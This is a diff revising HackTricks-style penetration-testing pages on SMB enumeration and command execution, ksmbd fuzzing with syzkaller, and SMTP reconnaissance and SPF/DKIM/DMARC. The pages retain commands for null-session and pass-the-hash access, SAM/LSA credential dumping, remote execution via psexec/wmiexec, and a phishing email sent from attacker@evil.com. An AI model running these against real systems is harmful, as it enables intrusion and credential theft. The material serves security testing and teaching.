@@ -193,7 +183,7 @@ rpcclient-enumeration.md
 
 ### List shared folders
 
-It is always recommended to look if you can access to anything, if you don't have credentials try using **null** **credentials/guest user**.
+Always check what the server exposes. If the rules of engagement permit it and no credentials are available, test anonymous and guest access.
 
 ```bash
 smbclient --no-pass -L //<IP> # Null user
@@ -205,8 +195,8 @@ smbmap -u "username" -p "<NT>:<LM>" -H <IP> [-P <PORT>] #Pass-the-Hash
 smbmap -R -u "username" -p "password" -H <IP> [-P <PORT>] #Recursive list
 
 crackmapexec smb <IP> -u '' -p '' --shares #Null user
-crackmapexec smb <IP> -u 'username' -p 'password' --shares #Guest user
-crackmapexec smb <IP> -u 'username' -H '<HASH>' --shares #Guest user
+crackmapexec smb <IP> -u 'username' -p 'password' --shares # Password authentication
+crackmapexec smb <IP> -u 'username' -H '<HASH>' --shares # NT-hash authentication
 ```
 
 ### **Connect/List a shared folder**
@@ -217,7 +207,7 @@ smbclient --no-pass //<IP>/<Folder>
 smbclient -U 'username[%passwd]' -L [--pw-nt-hash] //<IP> #If you omit the pwd, it will be prompted. With --pw-nt-hash, the pwd provided is the NT hash
 #Use --no-pass -c 'recurse;ls'  to list recursively with smbclient
 
-#List with smbmap, without folder it list everything
+# List with smbmap; without a folder it lists everything
 smbmap [-u "username" -p "password"] -R [Folder] -H <IP> [-P <PORT>] # Recursive list
 smbmap [-u "username" -p "password"] -r [Folder] -H <IP> [-P <PORT>] # Non-Recursive list
 smbmap -u "username" -p "<NT>:<LM>" [-r/-R] [Folder] -H <IP> [-P <PORT>] #Pass-the-Hash
@@ -225,9 +215,9 @@ smbmap -u "username" -p "<NT>:<LM>" [-r/-R] [Folder] -H <IP> [-P <PORT>] #Pass-t
 
 ### **Manually enumerate windows shares and connect to them**
 
-It may be possible that you are restricted to display any shares of the host machine and when you try to list them it appears as if there aren't any shares to connect to. Thus it might be worth a short to try to manually connect to a share. To enumerate the shares manually you might want to look for responses like NT_STATUS_ACCESS_DENIED and NT_STATUS_BAD_NETWORK_NAME, when using a valid session (e.g. null session or valid credentials). These may indicate whether the share exists and you do not have access to it or the share does not exist at all.
+Share enumeration may be restricted even when a known share can be reached. It can therefore be useful to try common share names directly. With a valid session, responses such as `NT_STATUS_ACCESS_DENIED` and `NT_STATUS_BAD_NETWORK_NAME` can sometimes distinguish an existing but inaccessible share from a nonexistent one, although servers and security products may normalize errors.
 
-Common share names for windows targets are
+Common share names on Windows targets include:
 
 - C$
 - D$
@@ -278,7 +268,7 @@ smbclient -U '%' -N \\192.168.0.24\\ADMIN$ # returns NT_STATUS_ACCESS_DENIED or 
 PowerShell
 
 ```bash
-# Retrieves the SMB shares on the locale computer.
+# Retrieves the SMB shares on the local computer.
 Get-SmbShare
 Get-WmiObject -Class Win32_Share
 # Retrieves the SMB shares on a remote computer.
@@ -358,11 +348,11 @@ Snaffler.exe -s -d domain.local -o snaffler.log -v data
 sudo crackmapexec smb 10.10.10.10 -u username -p pass -M spider_plus --share 'Department Shares'
 ```
 
-Specially interesting from shares are the files called **`Registry.xml`** as they **may contain passwords** for users configured with **autologon** via Group Policy. Or **`web.config`** files as they contains credentials.
+Files named **`Registry.xml`** are especially interesting because legacy Group Policy Preferences may contain recoverable `cpassword` values. **`web.config`** files may also contain application secrets or connection strings.
 
 > [!TIP]
 > The **SYSVOL share** is **readable** by all authenticated users in the domain. In there you may **find** many different batch, VBScript, and PowerShell **scripts**.
-> You should **check** the **scripts** inside of it as you might **find** sensitive info such as **passwords**. Also, don’t trust automated share listings: even if a share looks read-only, the underlying NTFS ACLs may allow writes. Always test with smbclient by uploading a small file to `\\<dc>\\SYSVOL\\<domain>\\scripts\\`.
+> Check these scripts for sensitive information such as passwords. Do not trust automated share labels alone: the effective share and NTFS ACLs determine whether a write succeeds. If the assessment explicitly permits mutation, test with a uniquely named harmless file and remove it immediately; do not alter an existing logon script.
 > If writable, you can [poison logon scripts for RCE at user logon](../../windows-hardening/active-directory-methodology/acl-persistence-abuse/README.md#sysvolnetlogon-logon-script-poisoning).
 
 ### ShareHound – OpenGraph collector for SMB shares (BloodHound)
@@ -449,21 +439,21 @@ The **default config of** a **Samba** server is usually located in `/etc/samba/s
 
 | **Setting**                 | **Description**                                                     |
 | --------------------------- | ------------------------------------------------------------------- |
-| `browseable = yes`                 | Allow listing available shares in the current share?                             |
-| `read only = no`                   | Forbid the creation and modification of files?                                   |
-| `writable = yes`                   | Allow users to create and modify files?                                          |
-| `guest ok = yes`                   | Allow connecting to the service without using a password?                        |
-| `printable = yes`                  | Expose the share as a printer queue instead of a disk share?                     |
-| `print command = ... %J %s`        | Run a shell command on the server with client-controlled job metadata?           |
-| `enable privileges = yes`          | Honor privileges assigned to specific SID?                                       |
-| `force user = <name>`              | Perform every file operation as another UNIX user after authentication?          |
-| `wide links = yes`                 | Allow the share to follow symlinks outside the exported directory tree?          |
-| `allow insecure wide links = yes`  | Disable Samba's safety coupling between `wide links` and UNIX extensions?        |
-| `create mask = 0777`               | What permissions must be assigned to the newly created files?                    |
-| `directory mask = 0777`            | What permissions must be assigned to the newly created directories?              |
-| `logon script = script.sh`         | What script needs to be executed on the user's login?                            |
-| `magic script = script.sh`         | Which script should be executed when the script gets closed?                     |
-| `magic output = script.out`        | Where the output of the magic script needs to be stored?                         |
+| `browseable = yes`                 | Makes the share visible in browse/share lists.                                   |
+| `read only = no`                   | Allows writes when the effective filesystem permissions also permit them.         |
+| `writable = yes`                   | Synonym for `read only = no`.                                                     |
+| `guest ok = yes`                   | Allows access without a password, mapped according to the guest-account settings. |
+| `printable = yes`                  | Exposes the share as a printer queue rather than a disk share.                    |
+| `print command = ... %J %s`        | Runs a server-side print command with substituted job metadata and spool path.     |
+| `enable privileges = yes`          | Enables the privilege subsystem used for privileges assigned to SIDs.             |
+| `force user = <name>`              | Performs file operations as the specified UNIX user after connection setup.        |
+| `wide links = yes`                 | Permits following symlinks outside the exported tree when related safeguards allow it. |
+| `allow insecure wide links = yes`  | Removes Samba's safety coupling between `wide links` and UNIX extensions.          |
+| `create mask = 0777`               | Limits permission bits that clients may set on newly created files.                |
+| `directory mask = 0777`            | Limits permission bits that clients may set on newly created directories.          |
+| `logon script = script.sh`         | Specifies a client-side logon script path for domain logons.                       |
+| `magic script = script.sh`         | Names a file whose close event triggers server-side execution.                     |
+| `magic output = script.out`        | Names the file that receives output from the magic script.                         |
 
 The command `smbstatus` gives information about the **server** and about **who is connected**.
 
@@ -571,29 +561,25 @@ sudo ntpdate <dc.fqdn>
 netexec smb <dc.fqdn> -k
 ```
 
-For a complete client setup (krb5.conf generation, kinit, SSH GSSAPI/SPN caveats) see:<sup>[[8]](#references)</sup>
-
-{{#ref}}
-../pentesting-kerberos-88/README.md
-{{#endref}}
+For a complete client setup (`krb5.conf` generation, `kinit`, and GSSAPI/SPN caveats), see [Pentesting Kerberos](../pentesting-kerberos-88/README.md).<sup>[[8]](#references)</sup>
 
 ## **Execute Commands**
 
 ### **crackmapexec**
 
-crackmapexec can execute commands **abusing** any of **mmcexec, smbexec, atexec, wmiexec** being **wmiexec** the **default** method. You can indicate which option you prefer to use with the parameter `--exec-method`:
+CrackMapExec can execute commands through methods including **mmcexec, smbexec, atexec, and wmiexec**; supported choices and defaults vary by release. Select a method with `--exec-method`:
 
 ```bash
 apt-get install crackmapexec
 
 crackmapexec smb 192.168.10.11 -u Administrator -p 'P@ssw0rd' -X '$PSVersionTable' #Execute Powershell
-crackmapexec smb 192.168.10.11 -u Administrator -p 'P@ssw0rd' -x whoami #Excute cmd
+crackmapexec smb 192.168.10.11 -u Administrator -p 'P@ssw0rd' -x whoami # Execute cmd
 crackmapexec smb 192.168.10.11 -u Administrator -H <NTHASH> -x whoami #Pass-the-Hash
 # Using --exec-method {mmcexec,smbexec,atexec,wmiexec}
 
 crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --sam #Dump SAM
-crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --lsa #Dump LSASS in memmory hashes
-crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --sessions #Get sessions (
+crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --lsa # Dump LSA secrets
+crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --sessions # Get sessions
 crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --loggedon-users #Get logged-on users
 crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --disks #Enumerate the disks
 crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --users #Enumerate users
@@ -605,10 +591,10 @@ crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --rid-brute #RI
 crackmapexec smb <IP> -d <DOMAIN> -u Administrator -H <HASH> #Pass-The-Hash
 ```
 
-### [**psexec**](../../windows-hardening/lateral-movement/psexec-and-winexec.md)**/**[**smbexec**](../../windows-hardening/lateral-movement/smbexec.md)
+### [**psexec**](../../windows-hardening/lateral-movement/psexec-and-winexec.md) / [**smbexec**](../../windows-hardening/lateral-movement/psexec-and-winexec.md#impacket-smbexecpy-smbexec)
 
 Both options will **create a new service** (using _\pipe\svcctl_ via SMB) in the victim machine and use it to **execute something** (**psexec** will **upload** an executable file to ADMIN$ share and **smbexec** will point to **cmd.exe/powershell.exe** and put in the arguments the payload --**file-less technique-**-).\
-**More info** about [**psexec** ](../../windows-hardening/lateral-movement/psexec-and-winexec.md)and [**smbexec**](../../windows-hardening/lateral-movement/smbexec.md).\
+See the dedicated [psexec and smbexec page](../../windows-hardening/lateral-movement/psexec-and-winexec.md) for protocol details and additional examples.\
 In **kali** it is located on /usr/share/doc/python3-impacket/examples/
 
 ```bash
@@ -616,10 +602,10 @@ In **kali** it is located on /usr/share/doc/python3-impacket/examples/
 ./psexec.py [[domain/]username[:password]@]<targetName or address>
 ./psexec.py -hashes <LM:NT> administrator@10.10.10.103 #Pass-the-Hash
 psexec \\192.168.122.66 -u Administrator -p 123456Ww
-psexec \\192.168.122.66 -u Administrator -p q23q34t34twd3w34t34wtw34t # Use pass the hash
+psexec \\192.168.122.66 -u Administrator -p '<password>' # Sysinternals PsExec password authentication
 ```
 
-Using **parameter**`-k` you can authenticate against **kerberos** instead of **NTLM**
+With Impacket, `-k` requests Kerberos authentication instead of NTLM (usually using the current credential cache or supplied credentials).
 
 ### [wmiexec](../../windows-hardening/lateral-movement/wmiexec.md)/dcomexec
 
@@ -633,7 +619,7 @@ In **kali** it is located on /usr/share/doc/python3-impacket/examples/
 #You can append to the end of the command a CMD command to be executed, if you dont do that a semi-interactive shell will be prompted
 ```
 
-Using **parameter**`-k` you can authenticate against **kerberos** instead of **NTLM**
+With Impacket, `-k` requests Kerberos authentication instead of NTLM.
 
 ```bash
 #If no password is provided, it will be prompted
@@ -658,9 +644,7 @@ In **kali** it is located on /usr/share/doc/python3-impacket/examples/
 
 ### ksmbd attack surface and SMB2/SMB3 protocol fuzzing (syzkaller)
 
-{{#ref}}
-ksmbd-attack-surface-and-fuzzing-syzkaller.md
-{{#endref}}
+See [ksmbd attack surface and SMB2/SMB3 protocol fuzzing](ksmbd-attack-surface-and-fuzzing-syzkaller.md).
 
 ## **Bruteforce users credentials**
 
@@ -673,12 +657,12 @@ ridenum.py <IP> 500 50000 /root/passwds.txt #Get usernames bruteforcing that rid
 
 ## SMB relay attack
 
-This attack uses the Responder toolkit to **capture SMB authentication sessions** on an internal network, and **relays** them to a **target machine**. If the authentication **session is successful**, it will automatically drop you into a **system** **shell**.\
+An SMB relay attack captures or coerces an NTLM authentication attempt and forwards it to another service that accepts it. Success depends on protocol protections (especially SMB signing and channel binding), target configuration, account restrictions, and the relayed account's privileges. A successful relay may allow actions such as share access or remote administration, but it does not automatically yield a SYSTEM shell.<sup>[[11]](#references)</sup>\
 [**More information about this attack here.**](../../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md)
 
 ## SMB-Trap
 
-The Windows library URLMon.dll automatically try to authenticaticate to the host when a page tries to access some contect via SMB, for example: `img src="\\10.10.10.10\path\image.jpg"`
+Some Windows applications that use URLMon or related URL handlers may attempt integrated authentication when processing a UNC resource such as `<img src="file://10.10.10.10/path/image.jpg">`. Modern browser zone policy and application-specific restrictions can prevent or prompt for this behavior, so verify it against the exact client in scope.
 
 This happens with the functions:
 
@@ -687,7 +671,7 @@ This happens with the functions:
 - URLOpenStream
 - URLOpenBlockingStream
 
-Which are used by some browsers and tools (like Skype)
+Applications may call functions such as:
 
 ![From: http://www.elladodelmal.com/2017/02/como-hacer-ataques-smbtrap-windows-con.html](<../../images/image (358).png>)
 
@@ -697,7 +681,7 @@ Which are used by some browsers and tools (like Skype)
 
 ## NTLM Theft
 
-Similar to SMB Trapping, planting malicious files onto a target system (via SMB, for example) can illicit an SMB authentication attempt, allowing the NetNTLMv2 hash to be intercepted with a tool such as Responder. The hash can then be cracked offline or used in an [SMB relay attack](#smb-relay-attack).
+Similar to SMB trapping, planting crafted shortcut, document, or URL-bearing files on a target system can **elicit** an SMB authentication attempt when a user or vulnerable parser processes them. A tool such as Responder can capture the NTLMv2 challenge-response, which may then be tested offline or relayed when the relevant protections and account restrictions permit it.
 
 [See: ntlm_theft](../../windows-hardening/ntlm/places-to-steal-ntlm-creds.md#ntlm_theft)
 
@@ -782,5 +766,8 @@ Entry_6:
 - [6] [ShareHound (collector)](https://github.com/p0dalirius/sharehound)
 - [7] [ShareQL (DSL)](https://github.com/p0dalirius/shareql)
 - [8] [Pentesting Kerberos (88) – client setup and troubleshooting](../pentesting-kerberos-88/README.md)
+- [9] [Microsoft SMB2 transport specification](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-smb2/1dfacde4-b5c7-4494-8a14-a09d3ab4cc83)
+- [10] [SMB file sharing overview for Windows and Windows Server](https://learn.microsoft.com/en-us/windows-server/storage/file-server/file-server-smb-overview)
+- [11] [Microsoft overview of SMB signing and relay protection](https://learn.microsoft.com/en-us/windows-server/storage/file-server/smb-signing-overview)
 
 {{#include ../../banners/hacktricks-training.md}}

--- a/src/network-services-pentesting/pentesting-smb/ksmbd-attack-surface-and-fuzzing-syzkaller.md
+++ b/src/network-services-pentesting/pentesting-smb/ksmbd-attack-surface-and-fuzzing-syzkaller.md
@@ -3,7 +3,7 @@
 {{#include ../../banners/hacktricks-training.md}}
 
 ## Overview
-This page abstracts practical techniques to exercise and fuzz the Linux in-kernel SMB server (ksmbd) using syzkaller. It focuses on expanding the protocol attack surface through configuration, building a stateful harness capable of chaining SMB2 operations, generating grammar-valid PDUs, biasing mutations into weakly-covered code paths, and leveraging syzkaller features such as focus_areas and ANYBLOB. While the original research enumerates specific CVEs, here we emphasise the reusable methodology and concrete snippets you can adapt to your own setups.<sup>[[1]](#references)[[2]](#references)</sup>
+This page summarizes practical techniques for exercising and fuzzing the Linux in-kernel SMB server (ksmbd) with syzkaller. It focuses on expanding the protocol attack surface through configuration, building a stateful harness capable of chaining SMB2 operations, generating grammar-valid PDUs, biasing mutations toward weakly covered code paths, and using syzkaller features such as `focus_areas` and `ANYBLOB`. The cited research enumerates specific CVEs; this page emphasizes the reusable methodology and concrete snippets that can be adapted to a lab.<sup>[[1]](#references)[[2]](#references)</sup>
 
 Target scope: SMB2/SMB3 over TCP. Kerberos and RDMA are intentionally out-of-scope to keep the harness simple.
 
@@ -72,7 +72,7 @@ Caution: These relaxations are to facilitate fuzzing only. Do not deploy with th
 ## Stateful Harness: Extract Resources and Chain Requests
 SMB is stateful: many requests depend on identifiers returned by prior responses (SessionId, TreeID, FileID pairs). Your harness must parse responses and reuse IDs within the same program to reach deep handlers (e.g., smb2_create → smb2_ioctl → smb2_close).<sup>[[1]](#references)</sup>
 
-Example snippet to process a response buffer (skipping the +4B NetBIOS PDU length) and cache IDs:
+Example snippet to process a response buffer after stripping the four-byte SMB-over-TCP framing header and cache IDs:
 
 ```c
 // process response. does not contain +4B PDU length
@@ -84,7 +84,7 @@ void process_buffer(int msg_no, const char *buffer, size_t received) {
         tree_id = u32((const uint8_t *)(buffer + TREE_ID_OFFSET));
       break;
     case SMB2_SESS_SETUP:
-      // first session setup response carries session_id
+      // The harness expects its first successful session-setup response here.
       if (msg_no == 0x01 && received >= SESSION_ID_OFFSET + sizeof(uint64_t))
         session_id = u64((const uint8_t *)(buffer + SESSION_ID_OFFSET));
       break;
@@ -102,7 +102,7 @@ void process_buffer(int msg_no, const char *buffer, size_t received) {
 
 Tips
 - Keep one fuzzer process sharing authentication/state: better stability and coverage with ksmbd’s global/session tables. syzkaller still injects concurrency by marking ops async, rerun internally.<sup>[[6]](#references)</sup>
-- Syzkaller’s experimental reset_acc_state can reset global state but may introduce heavy slowdown. Prefer stability and focus fuzzing instead.<sup>[[1]](#references)</sup>
+- Syzkaller's experimental `reset_acc_state` can reset accumulated state but may introduce substantial slowdown. Measure whether the added isolation is worth the throughput cost for the target.<sup>[[1]](#references)</sup>
 
 ## Recover Coverage From ksmbd Worker Threads
 Recent ksmbd fuzzing work added KCOV remote coverage support via a per-connection handle because SMB requests are received on the connection thread and then executed asynchronously by `handle_ksmbd_work()` kworkers. Without that plumbing, valid network traffic can still reach the target but syzkaller loses visibility into the worker-side execution, which makes deeper ksmbd paths look artificially cold.<sup>[[15]](#references)</sup>
@@ -269,7 +269,7 @@ Higher-value captures to seed on purpose
 
 ## Sanitizers: Beyond KASAN
 - KASAN remains the primary detector for heap bugs (UAF/OOB).<sup>[[8]](#references)</sup>
-- KCSAN often yields false positives or low-severity data races in this target.<sup>[[10]](#references)</sup>
+- KCSAN may report real but low-impact or intentionally tolerated data races in this target; triage each report rather than treating every race as an exploitable bug.<sup>[[10]](#references)</sup>
 - UBSAN/KUBSAN can catch declared-bounds mistakes that KASAN misses due to array-index semantics. Example:<sup>[[9]](#references)</sup>
 
 ```c
@@ -286,7 +286,7 @@ Setting num_subauth = 0 triggers an in-struct OOB read of sub_auth[-1], caught b
 
 ## Throughput and Parallelism Notes
 - A single fuzzer process (shared auth/state) tends to be significantly more stable for ksmbd and still surfaces races/UAFs thanks to syzkaller’s internal async executor.
-- With multiple VMs, you can still hit hundreds of SMB commands/second overall. Function-level coverage around ~60% of fs/smb/server and ~70% of smb2pdu.c is attainable, though state-transition coverage is under-represented by such metrics.<sup>[[1]](#references)</sup>
+- The cited setup reached hundreds of SMB commands per second across multiple VMs and reported function-level coverage around 60% of `fs/smb/server` and 70% of `smb2pdu.c`. Treat these as environment-specific observations, not expected guarantees; function coverage also under-represents state-transition coverage.<sup>[[1]](#references)</sup>
 
 ---
 

--- a/src/network-services-pentesting/pentesting-smtp/README.md
+++ b/src/network-services-pentesting/pentesting-smtp/README.md
@@ -1,15 +1,15 @@
-# 25,465,587 - Pentesting SMTP/s
+# 25, 465, 587 - Pentesting SMTP
 
 {{#include ../../banners/hacktricks-training.md}}
 
 
-## **Basic Information**
+## Basic information<sup>[[9]](#references)[[10]](#references)</sup>
 
-The **Simple Mail Transfer Protocol (SMTP)** is a protocol utilized within the TCP/IP suite for the **sending and receiving of e-mail**. Due to its limitations in queuing messages at the recipient's end, SMTP is often employed alongside either **POP3 or IMAP**. These additional protocols enable users to store messages on a server mailbox and to periodically download them.
+The **Simple Mail Transfer Protocol (SMTP)** transports email between mail systems and submits outgoing messages. Users normally retrieve or synchronize messages from a mailbox with **POP3 or IMAP** instead.<sup>[[9]](#references)</sup>
 
-In practice, it is common for **e-mail programs** to employ **SMTP for sending e-mails**, while utilizing **POP3 or IMAP for receiving** them. On systems based on Unix, **sendmail** stands out as the SMTP server most frequently used for e-mail purposes. The commercial package known as Sendmail encompasses a POP3 server. Furthermore, **Microsoft Exchange** provides an SMTP server and offers the option to include POP3 support.
+Common mail transfer agents include Postfix, Exim, Sendmail, and Microsoft Exchange. Mail clients use SMTP for sending and POP3 or IMAP for mailbox access.
 
-**Default port:** 25,465(ssl),587(ssl)
+**Default ports:** TCP/25 for server-to-server SMTP (often upgraded with STARTTLS), TCP/465 for message submission over implicit TLS, and TCP/587 for message submission (normally with STARTTLS).<sup>[[9]](#references)[[10]](#references)</sup>
 
 ```
 PORT   STATE SERVICE REASON  VERSION
@@ -32,19 +32,17 @@ Also note the default `<tenant>.onmicrosoft.com` domain: its MX record always po
 - Regularly audit accepted domains and their MX routing.
 - Configure mail servers to **only accept** inbound from the SEG.
 
-### EMAIL Headers
+### Email headers
 
-If you have the opportunity to **make the victim send you a email** (via contact form of the web page for example), do it because **you could learn about the internal topology** of the victim seeing the headers of the mail.
+If you can make the target send you an email (for example, through a website contact form), inspect its headers for information about the target's internal mail topology.
 
-You can also get an email from a SMTP server trying to **send to that server an email to a non-existent address** (because the server will send to the attacker a NDN mail). But, be sure that you send the email from an allowed address (check the SPF policy) and that you can receive NDN messages.
+You may also obtain a nondelivery report by sending a message to a nonexistent address. Use an allowed sender (check the SPF policy) and an address that can receive delivery-status notifications.
 
-You should also try to **send different contents because you can find more interesting information** on the headers like: `X-Virus-Scanned: by av.domain.com`\
-You should send the EICAR test file.\
-Detecting the **AV** may allow you to exploit **known vulnerabilities.**
+Different message content may produce additional headers such as `X-Virus-Scanned: by av.domain.com`. When explicitly authorized, an EICAR test file can help identify the antivirus product and reveal whether known vulnerabilities apply.
 
 ## Basic actions
 
-### **Banner Grabbing/Basic connection**
+### Banner grabbing and basic connection
 
 **SMTP:**
 
@@ -59,7 +57,7 @@ openssl s_client -crlf -connect smtp.mailgun.org:465 #SSL/TLS without starttls c
 openssl s_client -starttls smtp -crlf -connect smtp.mailgun.org:587
 ```
 
-### Finding MX servers of an organisation
+### Finding an organization's MX servers
 
 ```bash
 dig +short mx google.com
@@ -116,9 +114,9 @@ MAIL FROM: me
 
 Check if you sniff some password from the packets to port 25
 
-### [Auth bruteforce](../../generic-hacking/brute-force.md#smtp)
+### [Authentication brute force](../../generic-hacking/brute-force.md#smtp)
 
-## Username Bruteforce Enumeration
+## Username enumeration
 
 **Authentication is not always needed**<sup>[[3]](#references)</sup>
 
@@ -189,7 +187,7 @@ Nmap: nmap --script smtp-enum-users <IP>
 
 ## DSN Reports
 
-**Delivery Status Notification Reports**: If you send an **email** to an organisation to an **invalid address**, the organisation will notify that the address was invalided sending a **mail back to you**. **Headers** of the returned email will **contain** possible **sensitive information** (like IP address of the mail services that interacted with the reports or anti-virus software info).
+**Delivery Status Notification (DSN) reports:** If you send an email to an invalid address, the receiving organization may return a failure notification. Its headers can disclose sensitive information such as mail-service IP addresses and antivirus software details.
 
 ## [Commands](smtp-commands.md)
 
@@ -219,7 +217,7 @@ swaks --to hr@example.local --from attacker@evil.com --header "Subject: Resume" 
 
 <details>
 
-<summary>Pyhton code here</summary>
+<summary>Python code</summary>
 
 ```python
 from email.mime.multipart import MIMEMultipart
@@ -268,7 +266,7 @@ print("[***]successfully sent email to %s:" % (msg['To']))
 
 ## SMTP Smuggling
 
-SMTP Smuggling vulnerability allowed to bypass all the SMTP protections (check the next section for more info about protections). For more info on SMTP Smuggling check:
+SMTP smuggling vulnerabilities can bypass SMTP security controls by exploiting differences in how mail servers recognize message boundaries. For more information, see:
 
 
 {{#ref}}
@@ -309,15 +307,14 @@ The primitive is constrained (newline or carriage return), but the offset is inf
 
 ## Mail Spoofing Countermeasures
 
-Organizations are prevented from having unauthorized email sent on their behalf by employing **SPF**, **DKIM**, and **DMARC** due to the ease of spoofing SMTP messages.
+Organizations use **SPF**, **DKIM**, and **DMARC** to reduce unauthorized email sent on their behalf.
 
-A **complete guide to these countermeasures** is made available at [https://seanthegeek.net/459/demystifying-dmarc/](https://seanthegeek.net/459/demystifying-dmarc/).
+A detailed guide to these countermeasures is available in [Demystifying DMARC](https://seanthegeek.net/459/demystifying-dmarc/).<sup>[[8]](#references)</sup>
 
-### SPF
+### SPF<sup>[[11]](#references)</sup>
 
 > [!CAUTION]
-> SPF [was "deprecated" in 2014](https://aws.amazon.com/premiumsupport/knowledge-center/route53-spf-record/). This means that instead of creating a **TXT record** in `_spf.domain.com` you create it in `domain.com` using the **same syntax**.\
-> Moreover, to reuse previous spf records it's quiet common to find something like `"v=spf1 include:_spf.google.com ~all"`
+> The dedicated DNS SPF resource-record type was deprecated; SPF policies must be published as **TXT records** at the exact domain whose mail is being evaluated. Helper policies may still live at names such as `_spf.example.com` and be referenced with `include`, for example `"v=spf1 include:_spf.google.com ~all"`.
 
 **Sender Policy Framework** (SPF) is a mechanism that enables Mail Transfer Agents (MTAs) to verify whether a host sending an email is authorized by querying a list of authorized mail servers defined by the organizations. This list, which specifies IP addresses/ranges, domains, and other entities **authorized to send email on behalf of a domain name**, includes various "**Mechanisms**" in the SPF record.
 
@@ -337,8 +334,8 @@ From [Wikipedia](https://en.wikipedia.org/wiki/Sender_Policy_Framework):
 | INCLUDE   | References the policy of another domain. If that domain's policy passes, this mechanism passes. However, if the included policy fails, processing continues. To fully delegate to another domain's policy, the redirect extension must be used.                                                                                     |
 | REDIRECT  | <p>A redirect is a pointer to another domain name that hosts an SPF policy, it allows for multiple domains to share the same SPF policy. It is useful when working with a large amount of domains that share the same email infrastructure.</p><p>It SPF policy of the domain indicated in the redirect Mechanism will be used.</p> |
 
-It's also possible to identify **Qualifiers** that indicates **what should be done if a mechanism is matched**. By default, the **qualifier "+"** is used (so if any mechanism is matched, that means it's allowed).\
-You usually will note **at the end of each SPF policy** something like: **\~all** or **-all**. This is used to indicate that **if the sender doesn't match any SPF policy, you should tag the email as untrusted (\~) or reject (-) the email.**
+Each SPF mechanism may have a **qualifier** that determines the result when the mechanism matches. The default qualifier is `+` (PASS).\
+An SPF policy commonly ends with `~all` or `-all`, producing SOFTFAIL or FAIL respectively when no earlier mechanism matches.
 
 #### Qualifiers
 
@@ -370,11 +367,11 @@ dig txt _netblocks3.google.com | grep spf
 _netblocks3.google.com. 1903    IN      TXT     "v=spf1 ip4:172.217.0.0/19 ip4:172.217.32.0/20 ip4:172.217.128.0/19 ip4:172.217.160.0/20 ip4:172.217.192.0/19 ip4:172.253.56.0/21 ip4:172.253.112.0/20 ip4:108.177.96.0/19 ip4:35.191.0.0/16 ip4:130.211.0.0/22 ~all"
 ```
 
-Traditionally it was possible to spoof any domain name that didn't have a correct/any SPF record. **Nowadays**, if **email** comes from a **domain without a valid SPF record** is probably going to be **rejected/marked as untrusted automatically**.
+Mail from a domain without a valid SPF policy is more likely to be treated as untrusted, but receiver behavior varies and SPF alone does not prevent visible-header spoofing.
 
 To check the SPF of a domain you can use online tools like: [https://www.kitterman.com/spf/validate.html](https://www.kitterman.com/spf/validate.html)
 
-### DKIM (DomainKeys Identified Mail)
+### DKIM (DomainKeys Identified Mail)<sup>[[12]](#references)</sup>
 
 DKIM is utilized to sign outbound emails, allowing their validation by external Mail Transfer Agents (MTAs) through the retrieval of the domain's public key from DNS. This public key is located in a domain's TXT record. To access this key, one must know both the selector and the domain name.
 
@@ -388,11 +385,11 @@ dig 20120113._domainkey.gmail.com TXT | grep p=
 20120113._domainkey.gmail.com. 280 IN   TXT    "k=rsa\; p=MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA1Kd87/UeJjenpabgbFwh+eBCsSTrqmwIYYvywlbhbqoo2DymndFkbjOVIPIldNs/m40KF+yzMn1skyoxcTUGCQs8g3
 ```
 
-### DMARC (Domain-based Message Authentication, Reporting & Conformance)
+### DMARC (Domain-based Message Authentication, Reporting & Conformance)<sup>[[13]](#references)</sup>
 
 DMARC enhances email security by building on SPF and DKIM protocols. It outlines policies that guide mail servers in the handling of emails from a specific domain, including how to deal with authentication failures and where to send reports about email processing actions.
 
-**To obtain the DMARC record, you need to query the subdomain \_dmarc**
+Query the `_dmarc` subdomain to obtain the DMARC record:
 
 ```bash
 # Reject
@@ -551,7 +548,7 @@ The following was originally posted on openspf.org, which used to be a great res
 
 This makes sense - a subdomain may very well be in a different geographical location and have a very different SPF definition.
 
-### **Open Relay**
+### Open relay<sup>[[7]](#references)</sup>
 
 When emails are sent, ensuring they don't get flagged as spam is crucial. This is often achieved through the use of a **relay server that is trusted by the recipient**. However, a common challenge is that administrators might not be fully aware of which **IP ranges are safe to allow**. This lack of understanding can lead to mistakes in setting up the SMTP server, a risk frequently identified in security assessments.
 
@@ -706,7 +703,7 @@ s.sendmail(sender, [destination], msg_data)
 
 ### Postfix
 
-Usually, if installed, in `/etc/postfix/master.cf` contains **scripts to execute** when for example a new mail is receipted by a user. For example the line `flags=Rq user=mark argv=/etc/postfix/filtering-f ${sender} -- ${recipient}` means that `/etc/postfix/filtering` will be executed if a new mail is received by the user mark.
+When Postfix is installed, `/etc/postfix/master.cf` may define **scripts to execute** as part of mail handling. For example, `flags=Rq user=mark argv=/etc/postfix/filtering-f ${sender} -- ${recipient}` runs `/etc/postfix/filtering` when a new message is received for user `mark`.
 
 Other config files:
 
@@ -776,8 +773,13 @@ Entry_8:
 - [4] [0xdf – HTB/VulnLab JobTwo: Word VBA macro phishing via SMTP → hMailServer credential decryption → Veeam CVE-2023-27532 to SYSTEM](https://0xdf.gitlab.io/2026/01/27/htb-jobtwo.html)
 - [5] [The Silent Inbox: How Verified Emails Slip Past Email Security Gateways](https://21ad.netlify.app/blogs/the-silent-inbox-how-verified-emails-slip-past-email-security-gateways/)
 - [6] [Internal Information Disclosure using Hidden NTLM Authentication](https://medium.com/@m8r0wn/internal-information-disclosure-using-hidden-ntlm-authentication-18de17675666)
-- [7] [What could a hacker do with a misconfigured SMTP server?](https://www.reddit.com/r/HowToHack/comments/101it4u/what_could_hacker_do_with_misconfigured_smtp/)
+- [7] [Postfix – SMTP relay and access control](https://www.postfix.org/SMTPD_ACCESS_README.html)
